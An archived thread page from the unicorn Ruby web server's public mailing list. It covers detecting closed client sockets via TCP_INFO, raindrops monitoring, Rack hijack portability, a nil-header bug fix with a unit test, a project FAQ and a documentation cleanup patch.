On Wed, Feb 22, 2017 at 8:42 PM, Eric Wong <e@80x24.org> wrote:
> Simon Eskildsen <simon.eskildsen@shopify.com> wrote:
>
> <snip> Thanks for the writeup!
>
> Another sidenote: It seems nginx <-> unicorn is a bit odd
> for deployment in a containerized environment(*).
>
>> I meant to ask, in Raindrops why do you use the netlink API to get the
>> socket backlog instead of `getsockopt(2)` with `TCP_INFO` to get
>> `tcpi_unacked`? (as described in
>> http://www.ryanfrantz.com/posts/apache-tcp-backlog/) We use this to
>> monitor socket backlogs with a sidekick Ruby daemon. Although we're
>> looking to replace it with a middleware to simplify for Kubernetes.
>> It's one of our main metrics for monitoring performance, especially
>> around deploys.
>
> The netlink API allows independently-spawned processes to
> monitor others; so it can be system-wide.  TCP_INFO requires the
> process doing the checking to also have the socket open.
>
> I guess this reasoning for using netlink is invalid for containers,
> though...

If you namespace the network it's problematic, yeah. I'm considering
right now putting Raindrops in a middleware with the netlink API
inside the container, but it feels weird. That said, if you consider
the alternative of using `getsockopt(2)` on the listening socket, I
don't know how you'd get access to the Unicorn listening socket from a
middleware. Would it be nuts to expose a hook in Unicorn that allows
periodic execution for monitoring listening stats from Raindrops on
the listening socket? It seems somewhat of a narrow use-case, but on
the other hand I'm also not a fan of doing
`Raindrops::Linux.tcp_listener_stats("localhost:#{ENV["PORT"}")`, but
that might be less ugly.

>
>> I was going to use `env["unicorn.socket"]`/`env["puma.socket"]`, but
>> you could also do `env.delete("hijack_io")` after hijacking to allow
>> Unicorn to still render the response. Unfortunately the
>> `<webserver>.socket` key is not part of the Rack standard, so I'm
>> hesitant to use it. When this gets into Unicorn I'm planning to
>> propose it upstream to Puma as well.
>
> I was going to say env.delete("rack.hijack_io") is dangerous
> (since env could be copied by middleware); but apparently not:
> rack.hijack won't work with a copied env, either.
> You only need to delete with the same env object you call
> rack.hijack with.
>
> But calling rack.hijack followed by env.delete may still
> have unintended side-effects in other servers; so I guess
> we (again) cannot rely on hijack working portably.

Exactly, it gives the illusion of portability but e.g. Puma stores an
instance variable to check whether a middleware hijacked, rendering
the `env#delete` option useless.

>
>> Cool. How would you suggest I check for TCP_INFO compatible platforms
>> in Unicorn? Is `RUBY_PLATFORM.ends_with?("linux".freeze)` sufficient
>> or do you prefer another mechanism? I agree that we should fall back
>> to the write hack on other platforms.
>
> The Raindrops::TCP_Info class should be undefined on unsupported
> platforms, so I think you can check for that, instead.  Then it
> should be transparent to add FreeBSD support from unicorn's
> perspective.

Perfect. I'll start working on a patch.

>
>
> (*) So I've been wondering if adding a "unicorn-mode" to an
>     existing C10K, slow-client-capable Ruby/Rack server +
>     reverse proxy makes sense for containerized deploys.
>     Maybe...

I'd love to hear more about this idea. What are you contemplating?

^ permalink raw reply	[relevance 0%]

* Re: check_client_connection using getsockopt(2)
  2017-02-22 20:09  3%   ` Simon Eskildsen
@ 2017-02-23  1:42  4%     ` Eric Wong
  2017-02-23  2:42  0%       ` Simon Eskildsen
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2017-02-23  1:42 UTC (permalink / raw)
  To: Simon Eskildsen; +Cc: unicorn-public, raindrops-public

Simon Eskildsen <simon.eskildsen@shopify.com> wrote:

<snip> Thanks for the writeup!

Another sidenote: It seems nginx <-> unicorn is a bit odd
for deployment in a containerized environment(*).

> I meant to ask, in Raindrops why do you use the netlink API to get the
> socket backlog instead of `getsockopt(2)` with `TCP_INFO` to get
> `tcpi_unacked`? (as described in
> http://www.ryanfrantz.com/posts/apache-tcp-backlog/) We use this to
> monitor socket backlogs with a sidekick Ruby daemon. Although we're
> looking to replace it with a middleware to simplify for Kubernetes.
> It's one of our main metrics for monitoring performance, especially
> around deploys.

The netlink API allows independently-spawned processes to
monitor others; so it can be system-wide.  TCP_INFO requires the
process doing the checking to also have the socket open.

I guess this reasoning for using netlink is invalid for containers,
though...

> I was going to use `env["unicorn.socket"]`/`env["puma.socket"]`, but
> you could also do `env.delete("hijack_io")` after hijacking to allow
> Unicorn to still render the response. Unfortunately the
> `<webserver>.socket` key is not part of the Rack standard, so I'm
> hesitant to use it. When this gets into Unicorn I'm planning to
> propose it upstream to Puma as well.

I was going to say env.delete("rack.hijack_io") is dangerous
(since env could be copied by middleware); but apparently not:
rack.hijack won't work with a copied env, either.
You only need to delete with the same env object you call
rack.hijack with.

But calling rack.hijack followed by env.delete may still
have unintended side-effects in other servers; so I guess
we (again) cannot rely on hijack working portably.

> Cool. How would you suggest I check for TCP_INFO compatible platforms
> in Unicorn? Is `RUBY_PLATFORM.ends_with?("linux".freeze)` sufficient
> or do you prefer another mechanism? I agree that we should fall back
> to the write hack on other platforms.

The Raindrops::TCP_Info class should be undefined on unsupported
platforms, so I think you can check for that, instead.  Then it
should be transparent to add FreeBSD support from unicorn's
perspective.


(*) So I've been wondering if adding a "unicorn-mode" to an
    existing C10K, slow-client-capable Ruby/Rack server +
    reverse proxy makes sense for containerized deploys.
    Maybe...

^ permalink raw reply	[relevance 4%]

* Re: check_client_connection using getsockopt(2)
  2017-02-22 18:33  4% ` Eric Wong
@ 2017-02-22 20:09  3%   ` Simon Eskildsen
  2017-02-23  1:42  4%     ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Simon Eskildsen @ 2017-02-22 20:09 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public, raindrops-public

On Wed, Feb 22, 2017 at 1:33 PM, Eric Wong <e@80x24.org> wrote:
> Simon Eskildsen <simon.eskildsen@shopify.com> wrote:
>
> <snip> great to know it's still working after all these years :>
>
>> This confirms Eric's comment that the existing
>> `check_client_connection` works perfectly on loopback, but as soon as
>> you put an actual network between the Unicorn and client—it's only
>> effective 20% of the time, even with `TCP_NODELAY`. I'm assuming, due
>> to buffering, even when disabling Nagle's. As we're changing our
>> architecture, we move from ngx (lb) -> ngx (host) -> unicorn to ngx
>> (lb) -> unicorn. That means this patch will no longer work for us.
>
> Side comment: I'm a bit curious how you guys arrived at removing
> nginx at the host level (if you're allowed to share that info)
>
> I've mainly kept nginx on the same host as unicorn, but used
> haproxy or similar (with minimal buffering) at the LB level.
> That allows better filesystem load distribution for large uploads.


Absolutely. We're starting to experiment with Kubernetes, and a result
we're interested in simplifying ingress as much as possible. We could
still run them, but if I can avoid explaining why they're there for
the next 5 years—I'll be happy :) As I see, the current use-cases we
have for the host nginx are (with why we can get rid of it):

* Keepalive between edge nginx LBs and host LBs to avoid excessive
network traffic. This is not a deal-breaker, so we'll just ignore this
problem. It's a _massive_ amount of traffic normally though.
* Out of rotation. We take nodes gracefully out of rotation by
touching a file that'll return 404 on a health-checking endpoint from
the edge LBs. Kubernetes implements this by just removing all the
containers on that node.
* Graceful deploys. When we deploy with containers, we take each
container out of rotation with the local host Nginx, wait for it to
come up, and put it back in rotation. We don't utilize Unicorns
graceful restarts because we want a Ruby upgrade deploy (replacing the
container) to be the same as an updated code rollout.
* File uploads. As you mention, currently we load-balance this between
them. I haven't finished the investigation on whether this is feasible
on the front LBs. Otherwise we may go for a 2-tier Nginx solution or
expand the edge. However, with Kubernetes I'd really like to avoid
having host nginxes. It's not very native to the Kubernetes paradigm.
Does it balance across the network, or only to the pods on that node?
* check_client_connection working. :-) This thread.

Slow clients and other advantages we find from the edge Nginxes.

>> I propose instead of the early `write(2)` hack, that we use
>> `getsockopt(2)` with the `TCP_INFO` flag and read the state of the
>> socket. If it's in `CLOSE_WAIT` or `CLOSE`, we kill the connection and
>> move on to the next.
>>
>> https://github.com/torvalds/linux/blob/8fa3b6f9392bf6d90cb7b908e07bd90166639f0a/include/uapi/linux/tcp.h#L163
>>
>> This is not going to be portable, but we can do this on only Linux
>> which I suspect is where most production deployments of Unicorn that
>> would benefit from this feature run. It's not useful in development
>> (which is likely more common to not be Linux). We could also introduce
>> it under a new configuration option if desired. In my testing, this
>> works to reject 100% of requests early when not on loopback.
>
> Good to know about it's effectiveness!  I don't mind adding
> Linux-only features as long as existing functionality still
> works on the server-oriented *BSDs.
>
>> The code is essentially:
>>)?
>> def client_closed?
>>   tcp_info = socket.getsockopt(Socket::SOL_TCP, Socket::TCP_INFO)
>>   state = tcp_info.unpack("c")[0]
>>   state == TCP_CLOSE || state == TCP_CLOSE_WAIT
>> end
>
> +Cc: raindrops-public@bogomips.org -> https://bogomips.org/raindrops-public/
>
> Fwiw, raindrops (already a dependency of unicorn) has TCP_INFO
> support under Linux:
>
> https://bogomips.org/raindrops.git/tree/ext/raindrops/linux_tcp_info.c
>
> I haven't used it, much, but FreeBSD also implements a subset of
> this feature, nowadays, and ought to be supportable, too.  We
> can look into adding it for raindrops.

Cool, I think it makes sense to use Raindrops here, advantage being
it'd use the actual struct instead of a sketchy `#unpack`.

I meant to ask, in Raindrops why do you use the netlink API to get the
socket backlog instead of `getsockopt(2)` with `TCP_INFO` to get
`tcpi_unacked`? (as described in
http://www.ryanfrantz.com/posts/apache-tcp-backlog/) We use this to
monitor socket backlogs with a sidekick Ruby daemon. Although we're
looking to replace it with a middleware to simplify for Kubernetes.
It's one of our main metrics for monitoring performance, especially
around deploys.

>
> I don't know about other BSDs...
>
>> This could be called at the top of `#process_client` in `http_server.rb`.
>>
>> Would there be interest in this upstream? Any comments on this
>> proposed implementation? Currently, we're using a middleware with the
>> Rack hijack API, but this seems like it belongs at the webserver
>> level.
>
> I guess hijack means you have to discard other middlewares and
> the normal rack response handling in unicorn?  If so, ouch!
>
> Unfortunately, without hijack, there's no portable way in Rack
> to get at the underlying IO object; so I guess this needs to
> be done at the server level...
>
> So yeah, I guess it belongs in the webserver.

I was going to use `env["unicorn.socket"]`/`env["puma.socket"]`, but
you could also do `env.delete("hijack_io")` after hijacking to allow
Unicorn to still render the response. Unfortunately the
`<webserver>.socket` key is not part of the Rack standard, so I'm
hesitant to use it. When this gets into Unicorn I'm planning to
propose it upstream to Puma as well.

>
> I think we can automatically use TCP_INFO if available for
> check_client_connection; then fall back to the old early write
> hack for Unix sockets and systems w/o TCP_INFO (which would set
> the response_start_sent flag).
>
> No need to introduce yet another configuration option.

Cool. How would you suggest I check for TCP_INFO compatible platforms
in Unicorn? Is `RUBY_PLATFORM.ends_with?("linux".freeze)` sufficient
or do you prefer another mechanism? I agree that we should fall back
to the write hack on other platforms.

^ permalink raw reply	[relevance 3%]

* Re: check_client_connection using getsockopt(2)
  @ 2017-02-22 18:33  4% ` Eric Wong
  2017-02-22 20:09  3%   ` Simon Eskildsen
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2017-02-22 18:33 UTC (permalink / raw)
  To: Simon Eskildsen; +Cc: unicorn-public, raindrops-public

Simon Eskildsen <simon.eskildsen@shopify.com> wrote:

<snip> great to know it's still working after all these years :>

> This confirms Eric's comment that the existing
> `check_client_connection` works perfectly on loopback, but as soon as
> you put an actual network between the Unicorn and client—it's only
> effective 20% of the time, even with `TCP_NODELAY`. I'm assuming, due
> to buffering, even when disabling Nagle's. As we're changing our
> architecture, we move from ngx (lb) -> ngx (host) -> unicorn to ngx
> (lb) -> unicorn. That means this patch will no longer work for us.

Side comment: I'm a bit curious how you guys arrived at removing
nginx at the host level (if you're allowed to share that info)

I've mainly kept nginx on the same host as unicorn, but used
haproxy or similar (with minimal buffering) at the LB level.
That allows better filesystem load distribution for large uploads.

> I propose instead of the early `write(2)` hack, that we use
> `getsockopt(2)` with the `TCP_INFO` flag and read the state of the
> socket. If it's in `CLOSE_WAIT` or `CLOSE`, we kill the connection and
> move on to the next.
> 
> https://github.com/torvalds/linux/blob/8fa3b6f9392bf6d90cb7b908e07bd90166639f0a/include/uapi/linux/tcp.h#L163
> 
> This is not going to be portable, but we can do this on only Linux
> which I suspect is where most production deployments of Unicorn that
> would benefit from this feature run. It's not useful in development
> (which is likely more common to not be Linux). We could also introduce
> it under a new configuration option if desired. In my testing, this
> works to reject 100% of requests early when not on loopback.

Good to know about it's effectiveness!  I don't mind adding
Linux-only features as long as existing functionality still
works on the server-oriented *BSDs.

> The code is essentially:
> 
> def client_closed?
>   tcp_info = socket.getsockopt(Socket::SOL_TCP, Socket::TCP_INFO)
>   state = tcp_info.unpack("c")[0]
>   state == TCP_CLOSE || state == TCP_CLOSE_WAIT
> end

+Cc: raindrops-public@bogomips.org -> https://bogomips.org/raindrops-public/

Fwiw, raindrops (already a dependency of unicorn) has TCP_INFO
support under Linux:

https://bogomips.org/raindrops.git/tree/ext/raindrops/linux_tcp_info.c

I haven't used it, much, but FreeBSD also implements a subset of
this feature, nowadays, and ought to be supportable, too.  We
can look into adding it for raindrops.

I don't know about other BSDs...

> This could be called at the top of `#process_client` in `http_server.rb`.
> 
> Would there be interest in this upstream? Any comments on this
> proposed implementation? Currently, we're using a middleware with the
> Rack hijack API, but this seems like it belongs at the webserver
> level.

I guess hijack means you have to discard other middlewares and
the normal rack response handling in unicorn?  If so, ouch!

Unfortunately, without hijack, there's no portable way in Rack
to get at the underlying IO object; so I guess this needs to
be done at the server level...

So yeah, I guess it belongs in the webserver.

I think we can automatically use TCP_INFO if available for
check_client_connection; then fall back to the old early write
hack for Unix sockets and systems w/o TCP_INFO (which would set
the response_start_sent flag).

No need to introduce yet another configuration option.

^ permalink raw reply	[relevance 4%]

* Re: WTF is up with memory usage nowadays?
  @ 2017-02-08 20:00  4% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2017-02-08 20:00 UTC (permalink / raw)
  To: unicorn-public

Eric Wong <e@80x24.org> wrote:
>   The Rack response body only needs to respond to #each.
>   There should be no reason to build giant response
>   documents in memory before sending them to a client.
> 
>   unicorn can't do the following for you automatically since
>   we don't know how/if a Rack app will reuse a string;
>   but upstack authors can String#clear after yielding
>   in #each to ensure any malloced heap memory is immediately
>   available for future use (but beware of downstream middlewares
>   which do not expect this, too(**)):
> 
>     def each
>       # .. do something to generate a giant string
>       yield giant_string

... The yield above is so unicorn (or any server) can call
IO#write or similar (send(,_nonblock), write_nonblock, etc...).

That means once IO#write is complete, the contents of the string
is shipped off to the OS TCP stack and Ruby can forget about it:

>       giant_string.clear # String#clear
>     end

However, this is largely ineffective since Ruby 2.0.0 - 2.4.0
has a thread-safety fix which causes excessive garbage:

https://svn.ruby-lang.org/cgi-bin/viewvc.cgi?view=revision&revision=34847
https://svn.ruby-lang.org/cgi-bin/viewvc.cgi/trunk/io.c?r1=34847&r2=34846&pathrev=34847

And it looks like that went unnoticed for a few years...
Shame on all of us! :<

Anyways, it looks like an acceptable fix finally got accepted
for Ruby 2.5 (December 2017): https://bugs.ruby-lang.org/issues/13085

I've considered backporting a workaround into unicorn; but I'm
leaning against it since most apps do not recycle buffers at the
moment, so they make a lot of garbage, anyways.

Another place unicorn uses IO#write is buffering large files in
the TeeInput class; but I'm not sure if enough people care about
large uploads.  Embarrassingly, most of the large I/O apps I
maintain are still on 1.9.3, so I did not notice it :x
In any case, anybody running an up-to-date trunk or willing
to wait until Ruby 2.5 won't have to worry or think about this.


But yeah, all of this means there's still a both a runtime and
code complexity cost for supporting 1:1 native threads (at least
the way MRI does it).  This cost is there regardless of whether
or not the code you run uses threads.

^ permalink raw reply	[relevance 4%]

* Re: Unicorn is a famous and widely use software, but why official website look so outdate?
       [not found]     <CAOxZbrXuC-MTZjkQOREorkv8k4Cu9X3M5f_R1p8LYO+QyJhBug@mail.gmail.com>
@ 2016-05-26 21:57  3% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2016-05-26 21:57 UTC (permalink / raw)
  To: Zheng Cheng; +Cc: unicorn-public

Zheng Cheng <guokrfans@gmail.com> wrote:

Please don't send HTML email; it is bloated, spammy and your
mail got stuck in my spam filter instead of hitting the list.

About the Subject, unicorn itself is outdated by design:

	http://unicorn.bogomips.org/PHILOSOPY.html
	http://unicorn.bogomips.org/DESIGN.html

This list rejecting HTML is another "outdated" characteristic
of the project :)

Being outdated is not bad IMHO; more of us had slower computers
and connections back then and needed to make every byte matter.
Many "modern" websites are slow and inaccessible to poor and/or
low-eyesight users.

The CSS on the old website was as big as the README page;
slowing or even breaking rendering.  Nowadays it does not depend
on CSS at all, and is designed to reduce scrolling for users
on small screens (or big screens and giant fonts :)

Enabling CSS may also be dangerous:

	http://thejh.net/misc/website-terminal-copy-paste

Slow connections still come from poorer areas and even the
well-off have connectivity trouble over Tor or mobile.  Some of
us have bad eyesight and need gigantic fonts and custom colors
to read.  Web designers should not set colors or fonts for us.

A "modern" website also sets unrealistic expectations for
maintainers and potential contributors.  unicorn is a daemon,
it can never require a graphical interface to run, so users
should not be expected to run one, either.

Fame and being widely used are accidents since I little effort
into marketing.  It's nice to have it solve some problems for
users, but market dominance is harmful to ecosystems.

> and why not put source code on Github,

GitHub bundles a proprietary, centralized messaging platform we
cannot opt-out of.  It also requires registration,
terms-of-service, and JavaScript to use.

Plain-text email is universal and interoperable.  unicorn and
Ruby do not require registration, terms-of-service or JavaScript
to use; so contributing should never require those things,
either; even anonymous contributions are welcome.
Plain-text email is the only additional requirement,
anybody with Internet access hopefully has that.

> Write some Github Wiki,
> A contributor guide, Thing like that.

Some old-school projects have a "HACKING" file for contributors :)
http://unicorn.bogomips.org/HACKING.html

You can email comments, patches or pull requests here to improve
the docs (which becomes the website), so it's like a wiki with
review process over email.

> I am a newbie just start learning Unicorn and can't find any good tutorial
> about Unicorn. and recommend?

There is a short Usage section in the README and Configurator
docs:
	http://unicorn.bogomips.org/#label-Usage
	http://unicorn.bogomips.org/Unicorn/Configurator.html

But unicorn is not for everyone, so I recommend starting with
rack and tutorials, since unicorn is built on rack:

	https://github.com/rack/rack/wiki/tutorial-rackup-howto

unicorn is one of many rack servers you can choose from.  I
encourage people to try other ones and evaluate based on their
needs; not whatever some other websites are using.

> Thank you very much.

No problem :>

^ permalink raw reply	[relevance 3%]

* Re: undefined method `include?' for nil:NilClass (NoMethodError)
  @ 2015-11-17  0:27  3% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2015-11-17  0:27 UTC (permalink / raw)
  To: Owen Ou; +Cc: unicorn-public, api-team

Owen Ou <o@heroku.com> wrote:
> We recently upgraded to Unicorn 5.0 but getting the following error:
> 
> [2015-11-16T14:54:16.943652 #19838] ERROR -- : app error: undefined
> method `include?' for nil:NilClass (NoMethodError)
> 
> E, [2015-11-16T14:54:16.943712 #19838] ERROR -- :
> /home/api/vendor/bundle/ruby/2.2.0/gems/unicorn-5.0.0/lib/unicorn/http_response.rb:40:in
> `block in http_response_write'

<snip>

> The error came from this commit:
> https://github.com/defunkt/unicorn/commit/fb2f10e1d7a72e6787720003342a21f11b879614.
> And specifically the line of `if value =~ /\n/` is changed to `if
> value.include?("\n".freeze)`. Apparently `value` can be nil which
> caused our issue. It should be an easy fix.

Yes, easy, I reverted that hunk in the original change since it's
the easiest to verify as correct.  It's unfortunate, change to have
to make, though.

Thanks, will release 5.0.1 in less than a day...

---------------------8<-----------------------
Subject: [PATCH] http_response: allow nil values in response headers

This blatantly violates Rack SPEC, but we've had this bug since
March 2009[1].  Thus, we cannot expect all existing applications
and middlewares to fix this bug and will probably have to
support it forever.

Unfortunately, supporting this bug contributes to application
server lock-in, but at least we'll document it as such.

[1] commit 1835c9e2e12e6674b52dd80e4598cad9c4ea1e84
    ("HttpResponse: speed up non-multivalue headers")

Reported-by: Owen Ou <o@heroku.com>
Ref: <CAO47=rJa=zRcLn_Xm4v2cHPr6c0UswaFC_omYFEH+baSxHOWKQ@mail.gmail.com>
---
  Side note: I don't intend to port this change to less-popular servers
  I maintain.  This bug is yet another example of why monoculture or
  even any sort of majority adoption hurts an ecosystem.

 lib/unicorn/http_response.rb | 2 +-
 test/unit/test_response.rb   | 9 +++++++++
 2 files changed, 10 insertions(+), 1 deletion(-)

diff --git a/lib/unicorn/http_response.rb b/lib/unicorn/http_response.rb
index c1aa738..7b446c2 100644
--- a/lib/unicorn/http_response.rb
+++ b/lib/unicorn/http_response.rb
@@ -37,7 +37,7 @@ def http_response_write(socket, status, headers, body,
           # key in Rack < 1.5
           hijack = value
         else
-          if value.include?("\n".freeze)
+          if value =~ /\n/
             # avoiding blank, key-only cookies with /\n+/
             value.split(/\n+/).each { |v| buf << "#{key}: #{v}\r\n" }
           else
diff --git a/test/unit/test_response.rb b/test/unit/test_response.rb
index 0b14d59..fbe433f 100644
--- a/test/unit/test_response.rb
+++ b/test/unit/test_response.rb
@@ -33,6 +33,15 @@ def test_response_headers
     assert out.length > 0, "output didn't have data"
   end
 
+  # ref: <CAO47=rJa=zRcLn_Xm4v2cHPr6c0UswaFC_omYFEH+baSxHOWKQ@mail.gmail.com>
+  def test_response_header_broken_nil
+    out = StringIO.new
+    http_response_write(out, 200, {"Nil" => nil}, %w(hysterical raisin))
+    assert ! out.closed?
+
+    assert_match %r{^Nil: \r\n}sm, out.string, 'nil accepted'
+  end
+
   def test_response_string_status
     out = StringIO.new
     http_response_write(out,'200', {}, [])
-- 
EW

^ permalink raw reply related	[relevance 3%]

* unicorn non-technical FAQ
@ 2015-10-14 20:12  4% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2015-10-14 20:12 UTC (permalink / raw)
  To: unicorn-public

Maybe this should be on the website somewhere, but the mailing list
archives are quite accessible nowadays.

Fwiw, I tend to followup publically (anonymized content) with technical
stuff to the private email address <unicorn@bogomips.org>, but never
publically address the non-technical questions.  But some of the same
questions come up over and over, so I figure an FAQ might help.


Q: Can I use your logo?

A: What logo?  This project has never had a logo and never will.
   Logos are a waste of bandwidth, processing power, and
   yet-another potential exploitable code execution and/or
   denial-of-service vector.

   Ask the webmaster of the site you saw the logo on.


Q: Can you speak at so-and-so conference?

A: I do not speak.  Speech is synchronous and I will inevitably
   speak too fast for some, too slow for others; all while wasting
   CPU power and bandwidth to encode and distribute audio.

   Text is much more efficient as the reader can read at their
   own pace, skim over uninteresting parts, scan, etc.
   Text is far cheaper to distribute, archive and search than audio.

   Besides, unicorn has been technically obsolete since the early 90s,
   there's nothing interesting to talk about.  Read the source,
   mailing list archives, git commit history, etc. instead.


Q: May I interview you?

A: You already started :)  I have plain-text email and nothing else.

^ permalink raw reply	[relevance 4%]

* [PATCH] doc: remove references to old servers
@ 2015-07-15 22:05  2% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2015-07-15 22:05 UTC (permalink / raw)
  To: unicorn-public

They'll continue to be maintained, but we're no longer advertising
them.  Also, favor lowercase "unicorn" while we're at it since that
matches the executable and gem name to avoid unnecessary escaping
for RDoc.
---
 Application_Timeouts             |  6 +++---
 KNOWN_ISSUES                     | 14 +++++++-------
 Links                            | 30 ++++++++++++++----------------
 PHILOSOPHY                       |  6 ------
 README                           | 32 ++++++++++++++++----------------
 Sandbox                          |  2 +-
 TUNING                           | 10 +++++-----
 examples/nginx.conf              | 21 ++++++++++-----------
 ext/unicorn_http/unicorn_http.rl |  2 +-
 lib/unicorn.rb                   |  6 +++---
 lib/unicorn/configurator.rb      | 24 ++++++++++--------------
 lib/unicorn/http_server.rb       |  4 ++--
 lib/unicorn/socket_helper.rb     |  8 +++-----
 lib/unicorn/util.rb              |  2 +-
 lib/unicorn/worker.rb            |  4 ++--
 15 files changed, 78 insertions(+), 93 deletions(-)

diff --git a/Application_Timeouts b/Application_Timeouts
index 5f0370d..561a1cc 100644
--- a/Application_Timeouts
+++ b/Application_Timeouts
@@ -4,10 +4,10 @@ This article focuses on _application_ setup for Rack applications, but
 can be expanded to all applications that connect to external resources
 and expect short response times.
 
-This article is not specific to \Unicorn, but exists to discourage
+This article is not specific to unicorn, but exists to discourage
 the overuse of the built-in
 {timeout}[link:Unicorn/Configurator.html#method-i-timeout] directive
-in \Unicorn.
+in unicorn.
 
 == ALL External Resources Are Considered Unreliable
 
@@ -71,7 +71,7 @@ handle network/server failures.
 == The Last Line Of Defense
 
 The {timeout}[link:Unicorn/Configurator.html#method-i-timeout] mechanism
-in \Unicorn is an extreme solution that should be avoided whenever
+in unicorn is an extreme solution that should be avoided whenever
 possible.  It will help catch bugs in your application where and when
 your application forgets to use timeouts, but it is expensive as it
 kills and respawns a worker process.
diff --git a/KNOWN_ISSUES b/KNOWN_ISSUES
index 1950223..6b80517 100644
--- a/KNOWN_ISSUES
+++ b/KNOWN_ISSUES
@@ -13,7 +13,7 @@ acceptable solution.  Those issues are documented here.
 
 * PRNGs (pseudo-random number generators) loaded before forking
   (e.g. "preload_app true") may need to have their internal state
-  reset in the after_fork hook.  Starting with \Unicorn 3.6.1, we
+  reset in the after_fork hook.  Starting with unicorn 3.6.1, we
   have builtin workarounds for Kernel#rand and OpenSSL::Random users,
   but applications may use other PRNGs.
 
@@ -36,13 +36,13 @@ acceptable solution.  Those issues are documented here.
 
 * Under some versions of Ruby 1.8, it is necessary to call +srand+ in an
   after_fork hook to get correct random number generation.  We have a builtin
-  workaround for this starting with \Unicorn 3.6.1
+  workaround for this starting with unicorn 3.6.1
 
   See http://blade.nagaokaut.ac.jp/cgi-bin/scat.rb/ruby/ruby-core/36450
 
 * On Ruby 1.8 prior to Ruby 1.8.7-p248, *BSD platforms have a broken
   stdio that causes failure for file uploads larger than 112K.  Upgrade
-  your version of Ruby or continue using Unicorn 1.x/3.4.x.
+  your version of Ruby or continue using unicorn 1.x/3.4.x.
 
 * Under Ruby 1.9.1, methods like Array#shuffle and Array#sample will
   segfault if called after forking.  Upgrade to Ruby 1.9.2 or call
@@ -53,12 +53,12 @@ acceptable solution.  Those issues are documented here.
 
 * Rails 2.3.2 bundles its own version of Rack.  This may cause subtle
   bugs when simultaneously loaded with the system-wide Rack Rubygem
-  which Unicorn depends on.  Upgrading to Rails 2.3.4 (or later) is
+  which unicorn depends on.  Upgrading to Rails 2.3.4 (or later) is
   strongly recommended for all Rails 2.3.x users for this (and security
   reasons).  Rails 2.2.x series (or before) did not bundle Rack and are
   should be unnaffected.  If there is any reason which forces your
   application to use Rails 2.3.2 and you have no other choice, then
-  you may edit your Unicorn gemspec and remove the Rack dependency.
+  you may edit your unicorn gemspec and remove the Rack dependency.
 
   ref: http://mid.gmane.org/20091014221552.GA30624@dcvr.yhbt.net
   Note: the workaround described in the article above only made
@@ -71,9 +71,9 @@ acceptable solution.  Those issues are documented here.
     set :env, :production
     set :run, false
   Since this is no longer an issue with Sinatra 0.9.x apps, this will not be
-  fixed on our end.  Since Unicorn is itself the application launcher, the
+  fixed on our end.  Since unicorn is itself the application launcher, the
   at_exit handler used in old Sinatra always caused Mongrel to be launched
-  whenever a Unicorn worker was about to exit.
+  whenever a unicorn worker was about to exit.
 
   Also remember we're capable of replacing the running binary without dropping
   any connections regardless of framework :)
diff --git a/Links b/Links
index 5a586c1..ad05afd 100644
--- a/Links
+++ b/Links
@@ -1,13 +1,13 @@
 = Related Projects
 
-If you're interested in \Unicorn, you may be interested in some of the projects
+If you're interested in unicorn, you may be interested in some of the projects
 listed below.  If you have any links to add/change/remove, please tell us at
 mailto:unicorn-public@bogomips.org!
 
 == Disclaimer
 
-The \Unicorn project is not responsible for the content in these links.
-Furthermore, the \Unicorn project has never, does not and will never endorse:
+The unicorn project is not responsible for the content in these links.
+Furthermore, the unicorn project has never, does not and will never endorse:
 
 * any for-profit entities or services
 * any non-{Free Software}[http://www.gnu.org/philosophy/free-sw.html]
@@ -15,13 +15,13 @@ Furthermore, the \Unicorn project has never, does not and will never endorse:
 The existence of these links does not imply endorsement of any entities
 or services behind them.
 
-=== For use with \Unicorn
+=== For use with unicorn
 
 * {Bluepill}[https://github.com/arya/bluepill] -
   a simple process monitoring tool written in Ruby
 
 * {golden_brindle}[https://github.com/simonoff/golden_brindle] - tool to
-  manage multiple \Unicorn instances/applications on a single server
+  manage multiple unicorn instances/applications on a single server
 
 * {raindrops}[http://raindrops.bogomips.org/] - real-time stats for
   preforking Rack servers
@@ -29,27 +29,25 @@ or services behind them.
 * {UnXF}[http://bogomips.org/unxf/]  Un-X-Forward* the Rack environment,
   useful since unicorn is designed to be deployed behind a reverse proxy.
 
-=== \Unicorn is written to work with
+=== unicorn is written to work with
 
 * {Rack}[http://rack.github.io/] - a minimal interface between webservers
   supporting Ruby and Ruby frameworks
 
 * {Ruby}[https://www.ruby-lang.org/en/] - the programming language of
-  Rack and \Unicorn
+  Rack and unicorn
 
-* {nginx}[http://nginx.org/] - the reverse proxy for use with \Unicorn
+* {nginx}[http://nginx.org/] - the reverse proxy for use with unicorn
 
-* {kgio}[http://bogomips.org/kgio/] - the I/O library written for \Unicorn
+* {kgio}[http://bogomips.org/kgio/] - the I/O library written for unicorn
+  (deprecated and functionality being mainlined into Ruby)
 
 === Derivatives
 
-* {Green Unicorn}[http://gunicorn.org/] - a Python version of \Unicorn
+* {Green Unicorn}[http://gunicorn.org/] - a Python version of unicorn
 
-* {Rainbows!}[http://rainbows.bogomips.org/] - \Unicorn for sleepy
-  apps and slow clients (historical).
-
-* {yahns}[http://yahns.yhbt.net/] - like Rainbows!, but with fewer options
-  and designed for energy efficiency on idle sites.
+* {yahns}[http://yahns.yhbt.net/] - the complete opposite of unicorn in
+  every imaginable way.  Designed for energy efficiency on idle sites.
 
 === Prior Work
 
@@ -57,4 +55,4 @@ or services behind them.
   unicorn is based on
 
 * {david}[http://bogomips.org/david.git] - a tool to explain why you need
-  nginx in front of \Unicorn
+  nginx in front of unicorn
diff --git a/PHILOSOPHY b/PHILOSOPHY
index 18b2d82..feb83d9 100644
--- a/PHILOSOPHY
+++ b/PHILOSOPHY
@@ -137,9 +137,3 @@ unicorn is highly inefficient for Comet/reverse-HTTP/push applications
 where the HTTP connection spends a large amount of time idle.
 Nevertheless, the ease of troubleshooting, debugging, and management of
 unicorn may still outweigh the drawbacks for these applications.
-
-The {Rainbows!}[http://rainbows.bogomips.org/] aims to fill the gap for
-odd corner cases where the nginx + unicorn combination is not enough.
-While Rainbows! management/administration is largely identical to
